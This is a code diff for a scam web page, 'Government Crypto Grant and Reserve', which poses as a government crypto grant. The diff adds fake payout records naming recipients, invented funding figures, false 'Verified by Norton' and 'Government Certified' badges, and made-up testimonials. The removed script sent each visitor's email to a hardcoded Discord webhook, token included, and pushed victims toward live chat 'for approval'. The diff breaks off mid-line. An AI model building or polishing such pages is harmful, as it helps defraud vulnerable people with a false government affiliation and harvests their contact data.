--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Government Crypto Grant and Reserve</title>
-    <!-- Smartsupp Live Chat script with unique key -->
+    <!-- Smartsupp Live Chat -->
     <script type="text/javascript">
         var _smartsupp = _smartsupp || {};
         _smartsupp.key = 'ecd8907def84d4881af5c436a33a0753bb2efe1e';
@@ -86,7 +86,89 @@
             <p><strong>Your Reference ID:</strong> <span id="referenceId"></span></p>
         </div>
         <div id="statusMessage"></div>
+
+        <div class="payout-section">
+            <h3>Recent Payouts</h3>
+            <p>Once approved, your grant will be processed discreetly and securely. See below for examples of recent recipient payouts.</p>
+            <div class="recent-payouts">
+                <div class="payout-item">Rudy Henderson received $5,000 through PayPal Bitcoin.</div>
+                <div class="payout-item">James Prowler received $2,500 with Moon Pay.</div>
+                <div class="payout-item">Stella Stanford received $10,000 via Cash App.</div>
+                <div class="payout-item">Marcus Lee received $4,000 through Venmo transfer.</div>
+                <div class="payout-item">Elena Ramirez received $7,500 using Zelle.</div>
+            </div>
+        </div>
+
+        <div class="news-ticker">
+            <div class="ticker-content">
+                &nbsp; 2025 Grants Issued to 10,000+ Americans – Apply Now! &nbsp; | &nbsp; Total Funding Exceeds $50M! &nbsp; | &nbsp; New Crypto Reserve Launched Today! &nbsp;
+            </div>
+        </div>
+
+        <div class="security-badges">
+            <span>SSL Secured</span>
+            <span>Verified by Norton</span>
+            <span>Government Certified</span>
+        </div>
+
+        <div class="quiz-section">
+            <h3>Eligibility Quiz</h3>
+            <form id="eligibilityQuiz" onsubmit="event.preventDefault(); checkEligibility(event);">
+                <div class="form-group">
+                    <label>Are you a U.S. citizen?</label>
+                    <select name="citizen" required>
+                        <option value="">Select</option>
+                        <option value="yes">Yes</option>
+                        <option value="no">No</option>
+                    </select>
+                </div>
+                <div class="form-group">
+                    <label>Are you over 18?</label>
+                    <select name="age" required>
+                        <option value="">Select</option>
+                        <option value="yes">Yes</option>
+                        <option value="no">No</option>
+                    </select>
+                </div>
+                <button type="submit">Check Eligibility</button>
+            </form>
+            <div id="quizResult"></div>
+        </div>
+
+        <div class="live-stats">
+            <p>Grants Issued: <span id="grantsIssued">5,432</span></p>
+            <p>Total Funded: $<span id="totalFunded">12,000,000</span></p>
+        </div>
     </div>
+</div>
+
+<div class="testimonials">
+    <h2 style="text-align: center; clear: both;">Success Stories from 2025 Recipients</h2>
+    <div class="testimonial">
+        <img src="https://images.unsplash.com/photo-1494790108755-2616b612b786?w=80&h=80&fit=crop&crop=face" alt="Sarah M.">
+        <p><strong>Sarah M., Entrepreneur</strong><br>"Received my $10,000 BTC grant in under 24 hours! This program changed my startup."</p>
+    </div>
+    <div class="testimonial">
+        <img src="https://images.unsplash.com/photo-1472099645785-5658abf4ff4e?w=80&h=80&fit=crop&crop=face" alt="Mike R.">
+        <p><strong>Mike R., Innovator</strong><br>"PayPal payout was seamless. As a 2025 recipient, I highly recommend this official reserve."</p>
+    </div>
+    <div class="testimonial">
+        <img src="https://images.unsplash.com/photo-1507003211169-0a1dd7228f2d?w=80&h=80&fit=crop&crop=face" alt="Lisa T.">
+        <p><strong>Lisa T., Small Business Owner</strong><br>"Cash App transfer arrived instantly. Government Crypto Grant made my dreams reality!"</p>
+    </div>
+</div>
+
+<div class="video-testimonial" style="max-width: 1200px; margin: 20px auto; padding: 20px; background-color: rgba(255,255,255,0.95); border-radius: 5px; box-shadow: 0 0 5px rgba(0,0,0,0.1);">
+    <h3 style="text-align: center;">Video Testimonial</h3>
+    <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ?rel=0" title="Placeholder Testimonial Video" frameborder="0" allowfullscreen></iframe>
+    <p style="text-align: center; font-style: italic;">Watch John D. share his $15,000 grant success story!</p>
+</div>
+
+<div class="partner-logos">
+    <h3>Trusted Partners</h3>
+    <span>Bank USA</span>
+    <span>Crypto Exchange</span>
+    <span>Secure Pay</span>
 </div>
 
 <footer>
@@ -96,52 +178,4 @@
 <script>
     // Single-use reference codes
     let referenceCodes = [
-        'GCR-ABC123XYZ',
-        'GCR-DEF456UVS',
-        'GCR-GHI789RST',
-        'GCR-JKL012MNO',
-        'GCR-PQR345KLM'
-    ];
-
-    function generateReferenceCode() {
-        const email = document.getElementById('email').value;
-        const referenceIdSpan = document.getElementById('referenceId');
-        const referenceCodeContainer = document.getElementById('referenceCodeContainer');
-        const statusMessage = document.getElementById('statusMessage');
-
-        if (!email) {
-            statusMessage.style.display = 'block';
-            statusMessage.style.color = 'red';
-            statusMessage.textContent = 'Please enter a valid email.';
-            return;
-        }
-
-        if (referenceCodes.length === 0) {
-            statusMessage.style.display = 'block';
-            statusMessage.style.color = 'red';
-            statusMessage.textContent = 'All reference codes have been generated. Please contact support.';
-            return;
-        }
-
-        // Pick a random code and remove it from the array
-        const index = Math.floor(Math.random() * referenceCodes.length);
-        const code = referenceCodes.splice(index, 1)[0];
-
-        referenceIdSpan.textContent = code;
-        referenceCodeContainer.style.display = 'block';
-        statusMessage.style.display = 'block';
-        statusMessage.style.color = 'green';
-        statusMessage.textContent = `Reference code generated: ${code}. Contact live chat for approval.`;
-
-        // Send webhook
-        fetch('https://discord.com/api/webhooks/1392560855530602496/WLDqr-oxayIjorh97lgir03TQj4rcVYqnKDEMCoJ_jC_xix590twBocxE4eMY85ViMzG', {
-            method: 'POST',
-            headers: { 'Content-Type': 'application/json' },
-            body: JSON.stringify({
-                content: `🔥 New Registration - Government Crypto Grant:\nEmail: *${email}*\nReference ID: *${code}*`
-            })
-        }).catch(err => console.error('Webhook error:', err));
-    }
-</script>
-</body>
-</html>
+        'GCR-ABC
